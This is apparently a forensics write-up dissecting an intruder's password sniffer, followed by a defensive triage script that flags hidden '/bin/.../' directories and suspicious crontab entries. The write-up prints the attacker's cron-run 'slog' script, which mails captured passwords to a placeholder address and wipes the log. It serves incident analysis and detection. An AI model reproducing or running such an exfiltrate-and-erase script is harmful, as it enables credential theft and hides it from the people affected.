Forensics 11. Anatomy of a password sniffer

Captured passwords (which will appear in tcp.out) are mailed out periodically from one of root's cron jobs, using the slog script:

  bash# cat tcp.out
  filtering out smtp connections.
  Using logical device /dev/hme [/dev/hme]
  Output to stdout.

  Log started at => Sat May  1 05:40:43 [pid 18357]

  Log ended at => Sat May  1 05:42:38

  bash# cat slog
  #!/bin/.../ksh
  cat /bin/.../tcp.out | mail foo@bar.com
  echo " " >/bin/.../tcp.out
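
A triage check for the artifact shown above, as an added example that is not part of the original page. It assumes the `...` in `/bin/.../` is a literal directory name; the function names are hypothetical and the crontab lines are constructed sample input.

```shell
#!/bin/sh
# Added example: triage for dot-only path components like "/bin/.../".

# Read text on stdin (crontab entries, script bodies) and print, with line
# numbers, every line referencing a path component of three or more dots.
suspicious_refs() {
    grep -nE '/\.{3,}(/|[[:space:]]|$)'
}

# List directories under the given roots whose names start with three dots,
# or with ".." / "." followed by a space; a plain "ls" does not show them.
hidden_dirs() {
    find "$@" -xdev -type d \( -name '...*' -o -name '.. *' -o -name '. *' \) \
        -print 2>/dev/null
}

# Constructed sample: a root crontab with one entry that runs slog.
sample_crontab() {
    cat <<'EOF'
0 3 * * * /usr/lib/newsyslog
0,30 * * * * /bin/.../slog
15 4 * * 0 /usr/sbin/logadm
EOF
}

# The slog script as shown on the page.
sample_slog() {
    cat <<'EOF'
#!/bin/.../ksh
cat /bin/.../tcp.out | mail foo@bar.com
echo " " >/bin/.../tcp.out
EOF
}

# Demo on the samples. On a live system: crontab -l | suspicious_refs
# and: hidden_dirs /bin /usr /dev
echo "crontab entries to review:"; sample_crontab | suspicious_refs
echo "script lines to review:";    sample_slog | suspicious_refs
```
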